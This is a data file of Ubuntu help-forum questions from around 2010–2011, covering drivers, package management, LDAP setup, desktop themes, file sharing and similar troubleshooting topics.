29535	how do i access a mounted windows share from the command line ?	i use places > connect to server ... to connect to a windows share in my work environment ( requires kerberos authentication ) . when i do so , i can access the windows share via nautilus , but i ca n't figure out how to access the share from the command line without using smbclient . for example , the share is n't mounted under /mnt or /media . i also looked into ~/.gvfs but that 's empty as well . is it possible to access the mounted windows share from the command line without using smbclient ?
29540	browsing the internet from the command line	how can i browse the internet from the command line in maverick ?
29542	display files permissions in number format i.e `` 0755 '' ?	is there a way to get files/directories permissions in number format `` 0777 '' instead of `` -rw -- r -- r '' format ?
29543	issues with nvidia geforce 210 while watching movies	ever since 10.04 i have been trying to resolve an issue with my graphics card - nvidia geforce 210 . i 'm having issues when i watch movies on 10.10 - they are jumping all the time , even with compiz disabled and when that is the only thing i am doing . i have tried the solution to how to get nvidia geforce gt 210 drivers working on lucid lynx ? but it did n't work . how can i fix this ? here are the steps i took : apt-get -- purge remove xserver-xorg-video-nouveau edit /etc/default/grub to add the line grub_cmdline_linux= '' nouveau.modeset=0 '' sudo update-grub reboot download official linux drivers from nvidia site . sh filename-of-downloaded-driver-package
29545	how do you change the resize increment ?	i currently have my < distance name = `` left/right/bottom/whatever_width '' value = 0\ > so i have to use alt+f8 to resize windows . unfortunately , this is a bit cumbersome because the resize increment is so large . i 'd like to change it so that when using keybindings to resize a window , the window only changes by a few pixels per `` click '' . i have n't been able to find any information on this issue . is it even possible to do this ?
29546	does libreoffice support amipro format ( .sam ) ?	i was reading that libreoffice was finally opening up in supporting many of the formats that were eventually been closed in openoffice every time an update appeared . i see that lotus 1,2,3 and wordpro are there but does it support amipro .sam format ? i have about 10k documents just in one of the offices and work maybe more than 100k in total .sam documents and the only way to read them is using the amipro 3.1 original . but i want to change them all to .odt format assuming libreoffice supports amipro . if yes ( via an extension or a new upgrade ) i would search for a way via console to convert them from .sam to .odt .
29552	how do i enable font anti-aliasing in wine ?	fonts in some wine applications ( word 2007 for example ) are heavily aliased . how do i turn on anti aliasing for wine applications ?
29553	how can i configure unity ?	are there any configuration options for the unity desktop ? there are multiple valid answers for this question spanning over several versions of ubuntu . for your convenience an index of each below ( how can i tell which ubuntu release i 'm using ? ) : 13.04 12.10 12.04 11.10 11.04 if you 're looking to configure unity 2d , look here .
29557	hdmi port not recognized on sony vaio	i am running ubuntu 11.10 64bit with a sony vaio vpc f11 . it has an nvidia geforce 310m video card , with the latest nvidia drivers for the 64 bit linux , and a windows partition with win7 64bit . nvidia driver version is nvidia-linux-x86_64-280.13 external monitor is samsung syncmaster p2770 if i boot into the windows partition , the hdmi works as expected , with sound and video -- under linux , the hdmi port is not recognized at all , apparently , and provides no signal to the attached monitor . the nividia-settings tool does not recognize any monitor connected to the hdmi port . disper is installed and can not recognize an attached external monitor . can anyone help me diagnose this issue and fix it if possible ? the laptop has only the one hdmi port to connect any external monitor , so it i ca n't get this working i 'm stuck using either the laptop screen or windows . thanks
29559	how can i keep recent files from appearing in unity ?	i sometimes browse erotic media files but i would like to avoid having them appear in files & folders / recent . how can i do that ? the old `` making .recently-used.xbel a folder '' trick from 10.10 and older does n't work any more . plus i 'd prefer to turn off tracking only temporarily . i also prefer not to use a separate user for this , as switching users sometimes is n't fast enough .
29562	live cd does n't boot on an emac	i have tried booting from ubuntu on my emac , but when i hold down the c key , or any other key like option . it just continues to boot up mac os 10.3 , panther . i really want to run ubuntu on my mac , instead of mac os panther . my specs : 1gb of ram 800mhz ppc g4 processor 40gb hdd mac os 10.3 , panther .
29566	how to tell what applications are accessing the hard drive and how frequently ?	my hard drive is going crazy and i do n't know what application is doing it . are there any linux tools for profiling what processes are accessing drives and how frequently ? top , htop and the like neatly sort out the memory and cpu hogs , and nethogs lets me see the network hogs ... but what to use for determining hdd hogs ?
29574	how to search firefox bookmarks ?	is it possible to do a fulltext search ( or even better regexp ) automatically on all websites i have in my bookmark list ? edit is there any other browser where this is possible ?
29581	is there a good method to create a keyword cloud in ubuntu ?	so i have a pretty big server full of all sorts of open/office files , engineering data and whathaveyou and i was looking for a good way to index all of the data and create a tag or keyword cloud . is there any sort of tool do so something like this in ubuntu ? it would save me a ton of time in digging around and rooting out old files ...
29588	when you install and it has the checkmark for encryptying your home folder , what exactly does that mean ?	i know the basic idea behind encrypting , but what exactly does it mean to encrypt your home folder ? why would one choose to do that ?
29589	'chmod u+x ' versus 'chmod +x '	what is the difference between chmod u+x and just chmod +x ? i have seen a ton of tutorials that say to use u+x to make scripts executable . however , the u is not mentioned in the chmod help or manual . omitting the u does n't seem to have any effect either . is it just a deprecated argument ? thanks .
29595	`` ldap_add : naming violation ( 64 ) '' error when configuring openldap	i am following the ubuntu server guide to configure openldap on an ubuntu 10.04 server , but can not get it to work . when i try to use sudo ldapadd -x -d cn=admin , dc=don , dc=com -w -f frontend.ldif i 'm getting the following error : enter ldap password : < entered 'secret ' as password > adding new entry `` dc=don , dc=com '' ldap_add : naming violation ( 64 ) additional info : value of single-valued naming attribute 'dc ' conflicts with value present in entry again when i try to do the same , i 'm getting the following error : root @ avy-desktop : /home/avy # sudo ldapadd -x -d cn=admin , dc=don , dc=com -w -f frontend.ldif enter ldap password : ldap_bind : invalid credentials ( 49 ) here is the backend.ldif file : # load dynamic backend modules dn : cn=module , cn=config objectclass : olcmodulelist cn : module olcmodulepath : /usr/lib/ldap olcmoduleload : back_hdb # database settings dn : olcdatabase=hdb , cn=config objectclass : olcdatabaseconfig objectclass : olchdbconfig olcdatabase : { 1 } hdb olcsuffix : dc=don , dc=com olcdbdirectory : /var/lib/ldap olcrootdn : cn=admin , dc=don , dc=com olcrootpw : secret olcdbconfig : set_cachesize 0 2097152 0 olcdbconfig : set_lk_max_objects 1500 olcdbconfig : set_lk_max_locks 1500 olcdbconfig : set_lk_max_lockers 1500 olcdbindex : objectclass eq olclastmod : true olcdbcheckpoint : 512 30 olcaccess : to attrs=userpassword by dn= '' cn=admin , dc=don , dc=com '' write by anonymous auth by self write by * none olcaccess : to attrs=shadowlastchange by self write by * read olcaccess : to dn.base= '' '' by * read olcaccess : to * by dn= '' cn=admin , dc=don , dc=com '' write by * read frontend.ldif file : # create top-level object in domain dn : dc=don , dc=com objectclass : top objectclass : dcobject objectclass : organization o : example organization dc : example description : ldap example # admin user . dn : cn=admin , dc=don , dc=com objectclass : simplesecurityobject objectclass : organizationalrole cn : admin description : ldap administrator userpassword : secret dn : ou=people , dc=don , dc=com objectclass : organizationalunit ou : people dn : ou=groups , dc=don , dc=com objectclass : organizationalunit ou : groups dn : uid=john , ou=people , dc=don , dc=com objectclass : inetorgperson objectclass : posixaccount objectclass : shadowaccount uid : john sn : doe givenname : john cn : john doe displayname : john doe uidnumber : 1000 gidnumber : 10000 userpassword : password gecos : john doe loginshell : /bin/bash homedirectory : /home/john shadowexpire : -1 shadowflag : 0 shadowwarning : 7 shadowmin : 8 shadowmax : 999999 shadowlastchange : 10877 mail : john.doe @ don.com postalcode : 31000 l : toulouse o : example mobile : +33 ( 0 ) 6 xx xx xx xx homephone : +33 ( 0 ) 5 xx xx xx xx title : system administrator postaladdress : initials : jd dn : cn=example , ou=groups , dc=don , dc=com objectclass : posixgroup cn : example gidnumber : 10000 can anyone help me ?
29600	warning about unavailable repositories	an icon has recently appeared on my panel with an exclamation mark . the message i get when hovering over this is that the update information is out of date , and that this may be caused by an unavailable repository or a network isssue . my network connection appears to be ok . the message advises i manually check for updates . when i do this , i get the following message : w : failed to fetch http : //ppa.launchpad.net///ubuntu/dists/maverick/main/source/sources.gz 404 not found , w : failed to fetch http : //ppa.launchpad.net///ubuntu/dists/maverick/main/binary-amd64/packages.gz 404 not found , e : some index files failed to download , they have been ignored , or old ones used instead . any idea whats going on ?
29602	antec fusion black lcd wo n't turn off on system shutdown	i 've been struggling a while with getting the imon lcd/ir-receiver on my antec fusion black case to shutdown together with the system ( xbmc live 10 - ubuntu based ) . but it wo n't . when it 's turned off the lcd still lights up the whole room . many have proposed the `` solution '' of setting the machine into hibernation instead but that however wo n't work for me , since i 'm unable to suspend my system . it is the lcd/ir-module that prevents me from suspending and i have n't found a solution to properly unload it on suspending ( it 's way above my linux knowledge ) . i need help with getting the display to turn off the backlight when the system is turned off . can anyone please help me ? if anyone also has the knowledge on how to get the eject function to work on my antec veris rm200 remote i would be very grateful , i was told about that it could get fixed with irexec but i do not know how since i have n't been able to find a good tutorial on the subject . thank you for helping me !
29603	how do i clear xmodmap settings ?	exactly what the title asks . how do i clear xmodmap settings ? i have an ibm model m , and somehow xkeycaps got it into its head that my `` end '' key was not any key at all . xev reports keypresses when i use it , so i know the event is being generated by the keyboard . also , xkeycaps thinks that my arrow keys are all wonky , and apparently the scrollbar is broken so it only scrolls down - so i ca n't scroll up to find an ibm keyboard that just maybe is close to my map so i can fix my keys . so i 'm trying to reset my keyboard to the default settings , but the xmodmap manpage is woefully devoid of `` reset all '' or `` clear all '' or anything of that nature ( that i was able to find ) . help would be greatly appreciated !
29607	how to install awesome wm without root access ?	i want to install the awesome window manager . in the environment where i want to configure it i do n't have root access . i do have a machine were i can be root ( i use for this a virtual machine in my laptop ) . i have tried the following : $ sudo apt-get install awesome the following packages are about to be installed : awesome libev3 libid3tag0 libimlib2 liblua5.1-0 libxcb-icccm1 libxcb-image0 libxcb-keysyms1 libxcb-property1 libxcb-randr0 libxcb-xinerama0 libxcb-xtest0 libxdg-basedir1 menu rlwrap do you want to continue [ y/n ] ? n i do now have the list of dependencies for awesome , so i downloaded them all . for that , i did the following . $ pkgs= '' awesome libev3 libid3tag0 libimlib2 liblua5.1-0 libxcb-icccm1 libxcb-image0 libxcb-keysyms1 libxcb-property1 libxcb-randr0 libxcb-xinerama0 libxcb-xtest0 libxdg-basedir1 menu rlwrap '' # this is just for not writing it all ; ) $ sudo apt-get install -- download-only $ pkgs ... . $ mkdir -p /tmp/x_debs $ for pkg in $ pkgs ; do cp /var/cache/apt/archives/ $ pkg* /tmp/x_debs/ ; done [ copies all *.deb from my dependencies to /tmp/x_debs ] now , i want to install the dependencies . for that , i setup a fake dpkg install in my home folder : $ mkdir $ home/root $ mkdir -p $ home/root/var/lib/dpkg/ { triggers , updates } $ touch $ home/root/var/lib/dpkg/ { available , status } now i tried to install with dpkg , but i could not : $ dpkg -- force-not-root -- root= $ home/root -- recursive -i /tmp/x_debs it failed while trying to set permissions for the packages and running chroot . as i do have root access in this machine , i ran it with privileges : $ sudo dpkg -- root= $ home/root -- recursive -i /tmp/x_debs then i had a lot of stuff ( i.e. , everything : dependencies and the own wm ) installed inside $ home/root . particularly , xcb-* libraries were installed in $ home/root/usr/lib and the awesome binary in $ home/root/usr/bin/awesome . if i try to execute awesome as is i get as an error that libraries could not be loaded . that 's normal , as they are not in /usr/lib nor in /lib . so i ran export ld_library_path= $ home/root/usr/lib : $ home/root/lib : $ { ld_library_path } and awesome would try to load . however , i could not make gdm to run awesome within gnome or replacing it . i did it this way so i can copy everything in my $ home/root folder , paste it in the other machine and have it running . is there any other way ( to have less wasted space maybe.. ) to do this ? how can i tell gdm to exec awesome without root access ?
29610	use a light panel with elementary ( or other gtk+ themes that use dark panels ) ?	when using elementary ( at least , using the controls ) , it makes the panel dark , and i 'd like to use a light panel . how can i change this ? thanks for any help !
29617	which version of percona db package should i install ?	i am new to both percona & ubuntu . according to this page percona is only available for etch hardy lenny lucid maverick squeeze but i am using 11.04 ( natty ) . can someone recommend me which version should i choose ? cheers
29618	how do i see which disk i am booting from ?	i have two disks with the exact same partitioning and size . when i start the computer it obviously only boots from one of the disks . how can i tell which one ? ( i have used sudo fdisk -l , but that will list the disks but since they have the same partitioning and size , i do not get a clue on which one is getting booted from ) thanks in advance .
29620	will i be able to switch to gnome-shell in 11.04 ?	i 'm a bit confused about whether or not gnome-shell is a new distribution or just a desktop environment ? will shell be available to install and use instead of unity ?
29621	how can i remove gradients from elementary theme ?	i really do n't like the gradients in the elementary theme and i was wondering if there is a way to remove them from applications like nautilus-elementary , postler , dexter , etc . i 've tried commenting out the apps/ [ application ] .rc in /usr/share/themes/elementary/gtk-2.0/gtkrc but it does n't work . it still leaves the gradients in their place . i 'm a big fan of the other controls in the theme : the scroll bar , the way it borders gedit and the buttons , and i 'd like to keep these features , but i do n't like the way it styles its windows . edit : the gradients i 'm talking about are the ones at the top of the window . some examples : nautilus-elementary : postler : rhythmbbox : transmission : i 'd like to create a sort of matte look , similar to this , which was done using orta : nautilus-elementary : postler : rhythmbox : transmission : i 'd like a flat color , preferably without the line separating the top part of the application with the bottom .
29624	thunderbird compact is taking forever	the other day i came in to work and found that our development server - a ubuntu box - had a full hard disk . i did a bit of investigation and it seems like mozilla thunderbird is the major culprit . after burning off some backup files which did not need to be on the machine , the disk was left at 94 % : $ df -h filesystem size used avail use % mounted on /dev/sda1 895g 791g 59g 94 % / none 4.0g 300k 4.0g 1 % /dev none 4.0g 1.4m 4.0g 1 % /dev/shm none 4.0g 140k 4.0g 1 % /var/run none 4.0g 0 4.0g 0 % /var/lock none 4.0g 0 4.0g 0 % /lib/init/rw $ cd $ du -ch | grep [ 0-9 ] g 666g ./.thunderbird/ccsmcruu.default/imapmail/mail.adofms.com.au 666g ./.thunderbird/ccsmcruu.default/imapmail 667g ./.thunderbird/ccsmcruu.default 667g ./.thunderbird 2.2g ./.virtualbox/machines/ibike/snapshots 2.2g ./.virtualbox/machines/ibike 2.2g ./.virtualbox/machines 2.2g ./.virtualbox 670g . 670g total i did some reading and found that mozilla thunderbird does not compact files by default - i.e . all of the old emails that were sent to trash are still kept . one of the mailboxes used to get a lot of spam so i guess this accounts for the 667gb . i opened up thunderbird to see how much space the inbox actually takes up and it turns out to be approximately 500mb - over 1000 times less than the stuff that has not been compacted over the years . so i right clicked on the inbox directory in the tree on the left of thunderbird and selected 'compact ' . i left it for about 12hours but even after that it still said 'compacting folder ' on the status bar . i do n't use thunderbird on this pc - it belonged to a colleague who has left the company , however i do occasionally need to look through the inbox for references to the project i am working on , so deleting all traces of thunderbird is not an option . my question is - is there any way i can monitor the progress of thunderbird 's compacting function ? i would really like to know how long it is going to take . if there is any way i can speed up the compacting process i would also like to know .
29625	configure usb gsm modem	i want to configure evdo usb modem in ubuntu 10.10 i insert my usb modem to laptop and check the usb is detected or not using $ sudo lsusb and the result is : bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 002 : id 201e:2009 bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 003 : id 14cd:6600 super top usb 2.0 ide device bus 002 device 002 : id 201e:2009 is my us device . and than i execute command $ dmesg | grep -e tty [ 0.000000 ] console [ tty0 ] enabled [ 818.054660 ] usb 2-1.3 : gsm modem ( 1-port ) converter now attached to ttyusb0 [ 818.055125 ] usb 2-1.3 : gsm modem ( 1-port ) converter now attached to ttyusb1 [ 818.055647 ] usb 2-1.3 : gsm modem ( 1-port ) converter now attached to ttyusb2 [ 818.330641 ] option1 ttyusb0 : gsm modem ( 1-port ) converter now disconnected from ttyusb0 [ 818.330743 ] option1 ttyusb1 : gsm modem ( 1-port ) converter now disconnected from ttyusb1 [ 818.330840 ] option1 ttyusb2 : gsm modem ( 1-port ) converter now disconnected from ttyusb2 [ 1054.917473 ] usb 2-1.2 : gsm modem ( 1-port ) converter now attached to ttyusb0 [ 1054.917995 ] usb 2-1.2 : gsm modem ( 1-port ) converter now attached to ttyusb1 [ 1054.918481 ] usb 2-1.2 : gsm modem ( 1-port ) converter now attached to ttyusb2 [ 1055.214087 ] option1 ttyusb0 : gsm modem ( 1-port ) converter now disconnected from ttyusb0 [ 1055.214221 ] option1 ttyusb1 : gsm modem ( 1-port ) converter now disconnected from ttyusb1 [ 1055.214356 ] option1 ttyusb2 : gsm modem ( 1-port ) converter now disconnected from ttyusb2 why converter disconnected from ttyusb2 ? and than i try to execute command $ sudo wvdialconf sorry , no modem was detected ! is it in use by another program ? did you configure it properly with setserials ? i change the same type usb modem from my friend , but i still get error above .
29626	font corruption : lines through characters	i have a problem where a one-pixel high white line is displayed through certain letters of text . almost always only a single character type is affected at once , and only in one font size ( though that size can change over time ) . most of the time things are fine , but this happens several times a day . it happens frequently in firefox , but system dialogs , menus , etc . can also be affected . it 's been happening ever since i upgraded to 10.10 . only restarting seems to fix it . two examples ( in the first , only the larger `` r '' is corrupted ) : any help would be appreciated , thanks . edit : i 've since noticed that i can ( sometimes ) make the fonts appear correctly by zooming in/out all the way and returning to the default in firefox ( one or two steps , then going back , does nothing ) seems to make the problem go away temporarily . edit 2 : i figure it 's worth noting that the solution below does n't fully work for me any longer ( i 'm now using ubuntu 11.10 ) . it does significantly reduce the frequency of this problem occurring . edit 3 : still around in 12.04 . the fix provided by vanni works perfectly now for me , but apparently does n't for some . edit 4 : this seems to be an xorg problem , with vanni 's answer fixing it for many intel video cards . i 've had this occasionally happen with amd graphics cards in 13.10 and 14.04 , but very rarely ( only two or three times ) .
29627	why does my system boot so slowly ?	i installed ubuntu 10.10 a few days ago . it is really awesome but the problem is that it takes unusually long time ( about 20 minutes ) for the login screen to appear after the ubuntu startup screen . this only happens if i shutdown the computer . there is no problem when i restart the computer .
29629	dragon naturallyspeaking 11 installer on wine gets stuck	so i am trying to install dragon naturally speaking 11 on wine but at the installation i manage to get only at the last point of the setup where it is stuck for more than an hour what should i do now ? i believe clicking cancel will rollback changes but that seems to be the only thing remaining , or i can just kill this process and trying installing it over again , it might get over with this step . suggestions ?
29630	custom icon in `` places '' menu	i 'm pretty new to ubuntu , but i know the basics . i read the `` how do i change the folder icons in the âplacesâ menu ? '' but it did n't help , did the option # 2 since i want to specify it for a single directory ( for now ) . so what should i do ? i have the folder image as svg in : /usr/share/icons/hicolor/scalable/apps/ /usr/share/icons/hicolor/scalable/places/ the image i want to use : and where i want it :
29635	how do i program the gnome clock calendar with python ?	i want to develop a little application and i want to add events to the calendar of the gnome panel clock . how does it work ? is there a d-bus interface i can use ? or can i directly access the evolution-data-server ?
29637	no signal to monitor after driver install	after installing 10.10 i used hardware drivers ( jockey ) to install the graphics driver v11.2 for my ati hd 5770 . after restarting to activate the driver all went well and the boot screen showed up but not like the normal one the text was rough on the edges and after the boot finished the screen turned black and no signal . i have found some forum discussions about that issue but no fix worked for me . i use a dvi to vga adapter and i have a view sonic e70f crt monitor . this is the last thing i see before i get a no signal i found a bug report at launchpad.net take a look using sudo rm /etc/x11/xorg.conf and the rebooted the screen came on after the boot or splash screen the desktop resolution is 1152x864 i ca n't use the ccc `` catalyst control center '' : i ca n't enable desktop effects i have found that my edid in my monitor is corrupt and ubuntu is not reading my monitor when i set it to defalut and gives me this error : in windows the display is read as generic non-pnp monitor and it can live with that while ubuntu ca n't . the error message is the right size when i set my display as default . people told me i can put refresh rates horizontal and vertical and screen resolution in xorg . am i on the right track ? how can i do that ?
29639	how to make thunderbird notify of new email like evolution ?	in ubuntu when new mail arrives evolution changes message indicator to green color . i have migrated from evolution to thunderbird and that is why looking for how to make thunderbird react like evolution once a new mail arrives . update 1 i have forgotten to note that i do n't have administrator privileges in my working computer . thanks
29641	scripts used by `jockey-common`	is it possible to make a script that basically does the same thing as jockey-common ? i.e . an script to find any hardware that requires proprietary drivers and install them . edit as oli mentioned , the scripts are already present in ubuntu , if any of you are already aware as to which script corresponds to which options listed in jockey-text -- help and how to use them , please answer !
29642	black or corrupt ui artifacts under wine	this is something that 's been bugging me for quite some time . i 'm attaching a screenshot of the issue as seen in microsoft office word 2007 . while it does n't get in the way when it 's like this , i 've had to uninstall other apps as the black artefacts affected usability . here is the same issue in excel 2007 . setup i 'm running 32-bit ubuntu 10.10 , with an intel 945 chipset .
29647	where can i get mono 2.10 for maverick and natty ?	hi , i want to use mono for some projects , but in ubuntu ( or debian in general ) is just 2.6.7 avalible . and i could not find any packages or ppas . i tried to compile it myself , but i failed . where can i get the current mono 2.10 version for ubuntu maverick and natty ? http : //badgerports.org/ only supports lucid and hardy and is not up to date
29651	video player with good subtitle rendering	is there any way to improve the subtitle rendering capabilities of totem ? the subtitles positioning seems to be hard-coded in it and even though the style is user-customizable , it does not confirm to the formatting in subtitle data . in some scenes where writings appear , the subtitles are supposed to appear next to those along with what is being said at that moment . however , on those scenes the translations of text onscreen appears on the default subtitle area with nothing about the things being said . the correct rendering are according to the open-source windows video player , media player classic - home cinema . there is no linux port as far as i 'm aware . if vlc 's subtitle support is the same as in windows , it wo n't work for me , period . please suggest anyway to improve subtitle rendering in totem , other video players , or a way to port mpc-hc . update i 've determined that the subtitle rendering issue is not video player-specific . as suggested in the answers , i tried mplayer , and again the subtitle formatting was overridden by default settings somewhere . i ran smplayer in windows with the same videos , but this issue is not reproducible on it . update smplayer on ubuntu renders subtitles perfectly . i am at a loss to understand why the core mplayer could not do so . additionally , anyone know how to disable the while seek bar that appears in the center when moving forward/backward ? update with my interaction on mplayer 's mailing list , i discovered that -ass flag is required for correct ass/ssa subtitle rendering .
29654	ideas for my msc project and google summer of code 2011	i 'm currently putting together ideas for my master 's project which i 'll be working on over the summer , and i would like to be able to use this time to help ubuntu in some way . i have the freedom to come up with pretty much any project in the field of software development/engineering provided it is a substantial piece of software ( for reference , i will be working on it for five full months ) solves a problem for more people than just myself i was hoping to use this project as an opportunity to get some experience with the underbelly of linux , so that i can mention on my cv that i have 'experience in developing for *nix in c++ ' , which i 'm noticing more and more companies are looking for these days , probably because stuff 's moving to cloud servers and that 's where linux rules the roost . my problem is that , since i do n't have the experience to begin with , i 'm not sure what to do for such a project , and i was wondering if anyone could help me with this . i 've noticed from daniel holbach 's blog that ubuntu participated in the google summer of code 2010 , and that project ideas for that can be found here . however , i have not been able to find anything related to ubuntu and gsoc 2011 , but i have noticed from the gsoc timeline that the list of mentoring organisations will not be published until march 18th . i have two questions here . has ubuntu applied to be a part of summer of code 2011 , and what is the status of the 2010 project list linked to earlier . were they all implemented or are there still some that can be picked up now , should i not participate in gsoc ? i 'd like to do something for ubuntu , but i 'd rather not spend my time reinventing the wheel . update : jono bacon has confirmed on his weekly q & a that ubuntu has filed it 's application for gsoc 2011 . i 'll leave this question open until the wiki page for the project ideas is available . that said , ideas are still welcome ; )
29655	xdaliclock in gnome-screensaver	at the moment i use xscreensaver with xdaliclock . now i want to replace xscreensaver with gnome-screensaver . now my question is : how to configure gnome-screensaver to use xdaliclock ?
29656	does a mountpoint have to be an empty directory ?	or does it overwrite the existing data in the mountpoint ? or is it just un-accessible ?
29660	why was aptitude removed in favor of apt-get ?	why was aptitude removed in favor of apt-get by default ? i read it somewhere , but forgot - anyone bother to clear it up ? and does n't debian prefer aptitude and canonical apt-get ? update from the answers i understand aptitude was removed because it was no longer used for installation , but why does the installer use apt-get , when aptitude is supposed to be better ?
29662	midori displays mobile sites	i 've installed midori to work in an elementary mockup . midori works just fine , but , on a few domains , it opens mobile websites instead of the regular pages . a of now , this happens with gmail.com , facebook.com , paginegialle.it , and others ; yet other websites which do have a mobile version , as gazzetta.it , show the regular version . i could n't find a solution through settings and i did n't find any mention of this problem on forums or else , so any help would be greatly appreciated .
29663	how do i disable ntpd ?	i 'm running ubuntu in a vm . how do i disable ntpd ?
29665	how do i apt-get a 32-bit package on a 64-bit installation ?	i was trying to get a game working . but i have lucid lynx on amd64 running while the game binary was 32 bit ( no 64 bit version available and nobody was in the mood for recompiling ) . it lacked libfsml-windows1.5 to run , and apt-getting it failed . so i have to manually download the i386 packages and force install them . ( no , not part of ia32libs . ) now i 'm wondering if there is an automated way to have x86 packages downloaded at least on a 64-bit installation . apt-get -o apt : :architecture=i386 did not work . ( if you switch the architecture mode it does n't find the package or assumes missing dependencies for existing packages all around . ) is there another tool to automate that ? possibly one which downloads the i386 packages and relocates contained libraries into /usr/lib32/ implicitely ?
29671	functions of xdg-user-dirs	what are the functions and capabilities of xdg-user-dirs ? in particular , i 'm interested to have the folders it creates on a different partition instead of the whole home .
29675	entering `` vi mode '' in gnome-terminal	i use ssh -x user @ ip to connect to an ubuntu server which has had gnome-terminal installed on it . when inside gnome-terminal , occasionally i accidentally hit a key combination and the terminal behaves differently . i think i have entered `` vi mode '' . as an example , after i have hit this mysterious combination , i can press - and the font size of the terminal gets smaller . i have to press esc to get back into the normal mode . can anyone tell me what key combination i may have hit , and provide links or useful hints for the things i might be able to do with `` vi mode '' ? i have tried searching google but have n't found anything particularly good - most pages refer to `` vi mode '' inside vi . for information , i am using a french azerty keyboard , and the key combination i think i hit is altgr+- ( on azerty keyboards the number keys provide punctuation unless shift is pressed - the key i am pressing has the 6 on it ) , so that i can get the | character .
29677	does the ubuntu one mobile client have an integrated music store ?	i was wondering if the ubuntu one mobile client for android has an integrated music store ? i installed the client but i do not seem to be able to access the store .
29688	files downloading again after they 've been deleted	i deleted about 900 files , when i connected my computer they all started downloading again . i do n't want them to come back . in file management i only see an option to delete one file at a time . i am currently using the windows beta on windows 7 . once all the data is off i can switch oss .
29689	home on a different partition	how do i define a separate partition for home ? how does it affect systems with multiple users ? edit okay , thanks for all the answers , i understand the thing about home on adifferent partition , so now , i would like some info about the second question : how does it affect systems with multiple users ?
29697	wap browser with wmls support	i tried wapua , but it only opens wml files , and it ca n't execute the external scripts . i tried winwap on windows , but the scripts did n't work as expected , they showed dialog boxes and calculated everything but could n't set variables . i installed a nokia wap emulator on my moms windows xp and it worked but i ca n't always rely on teamviewer . so can you please tell me a wap browser for linux that supports wml scripts ?
29699	are there any plans to replace pitivi with openshot in 11.10 ?	openshot just released a new version which looks quite promising and i wondered whether pitivi would be replaced in future .
29701	does changing the theme improve system performance ?	i really have this feeling that after changing the theme on my ubuntu ( 10.10 - but it also happened on a different version ) the system is much quicker , or to say more precisely , the system is not loaded anymore . maybe it 's just a feeling and nothing more but i hope that i 'm not the only one seeing this !
29706	tagging gone from nautilus , gaj , tracker	i had installed gnome activity journal , zeitgeist and tracker but borked the install by mixing the ppas with the universe repos . i removed all the packages , did apt-get remove -- purge , then did a locate to manually rm everything else . then i reinstalled from the ppas properly . now i ca n't tag files anymore , either in nautilus or gaj . what packages are involved in tagging ? what else might i be missing ?
29707	how to disable floppy drive ?	i have a old athlon x2 based system with an attached floppy drive . i had some old floppies which are now safely backed up on cd 's . is there a way to simply disable the floppy drive , so that it wont be accessed in any way by the os ? i would not have bothered , but ubuntu seems to continually access the drive , and it is annoyingly noisy . thanks in advance .
29715	will samsung driver for notebooks get into the upstream kernel ?	i have a samsung n150 netbook and i installed unity 11.04 to make some tests . but some functions do not work like backlight and vertical scroll on the touchpad . there are drivers for samsung notbooks and i know that there is a ppa . but not for natty . will the drivers be avalible some day in the kernel by default ? will canonical add these drivers in the kernel , if the kernel developers wont ? i think this would be very useful because unity is great for netbooks and samsung netbooks are really nice .
29719	how can i repair a corrupt kernel if no others are installed ?	i 've been running ubuntu 10.04 on my laptop for quite some time . when i went to boot it up this morning , bam ! kernel panic ( which immediately lead to human panic ) when loading the kernel . so i 've spent much of the day troubleshooting , and my current theory is that the fs is fine , but that the kernel image may be corrupt . let 's go with this current theory for the sake of this question , as i am interested how it is done . how can i replace the kernel image if i have no bootable kernels ? can i boot to a 10.04 live cd , copy the the vmlinuz-2.6.3x ... to the hd and go from there ? would n't i want to copy the initramfs as well , but configured for the desktop system ? can i generate this from the live cd ?
29722	how do i fix a corrupted /var/lib/dpkg/status ?	i just discovered that /var/lib/dpkg/status is corrupted ( details ) : $ sudo dpkg -- audit dpkg : parse error , in file `/var/lib/dpkg/status ' near line 1888 package `libssl0.9.8 ' : field name ` ' must be followed by colon its backup does not appear to be corrupted , but it is outdated and i 'm not sure what the consequences of reverting to an earlier version are . what is the safest way to fix this ?
29724	migrating to natty ( or any other future versions of ubuntu )	i am hoping that this question would help other ubuntu users when migrating to a newer version of ubuntu . this should have all the info that they need . so please when you answer try to phrase them into points for easy understanding . i understand that some questions that i ask might have been asked before by other users . in that case just provide the links to those questions . i am running ubuntu 10.10 maverick meerkat in case that is important . i can say for sure that a clean install is definitely better than an upgrade since it gives you an opportunity to clean your system and get a fresh start . however some of us like to retain certain software configuration or files etc . the questions are as follows , how do you save the configuration files of certain application like for instance thunderbird , firefox , etc ... so that you can basically paste in the new version of ubuntu ? ( thunderbird for instance has all my mail , so i definitely would like to backup its configuration and then use it the new installation that i do ) i have some applications like matlab and maple ( based on java ) installed . when i migrate , can i just copy the entire installation folder to the new version of ubuntu ? would it still work as now if i do that ? when doing a backup which folders should be backed up ? obviously your personal files would be backup . but other than that , is it necessary to back up stuff in the home folder , /usr/bin etc ? i have burg installed . i am guessing that would be erased when i do a clean install along with the program 's configuration and everything . how can i do a backup of it ? i am dual booting my ubuntu alongside with windows 7 . when i perform the clean install of ubuntu , would grub ( bootloader ) be removed and in anyway jeopardize my windows installation ? over time i have added a lot of ppa which are of course compatible with my current ubuntu version . how do i make a backup of all my ppa and would they be compatible to the newer version of ubuntu when i restore them ? is there a way to get the entire list of user installed application and if possible automate the installation of those applications in the new system ? for instance i have application like vlc , ubuntu tweak etc . installed , and rather than have to install everything from scratch it would be nice to have a program do it . i hope this covers all the questions or doubts that a user might face when thinking about performing a clean install of his system . if i missed anything please mention it as a comment and i will add it to my question .
29726	is there a preferred way to set up a virtual ubuntu server on a desktop ?	i love ubuntu , and as i am searching the internet , i am finding that some questions i have have not been answered yet . one of them is if there is a preferred way to set up a virtual server . i look through the ubuntu software center , but found nothing from the search `` virtual server '' i then searched the internet and found lots of posts to trouble-shoot vmware virtual servers . so , like a good researcher i looked in the software center for vmware . sure enough i found `` user agent '' and `` view open client '' . i did n't get sufficient info from the software center . and searching the website only left me scratching my head . i want to install ubuntu server edition . i already have a server , but am cautious `` trying out '' things on it . so a virtual server sounds like what i need .
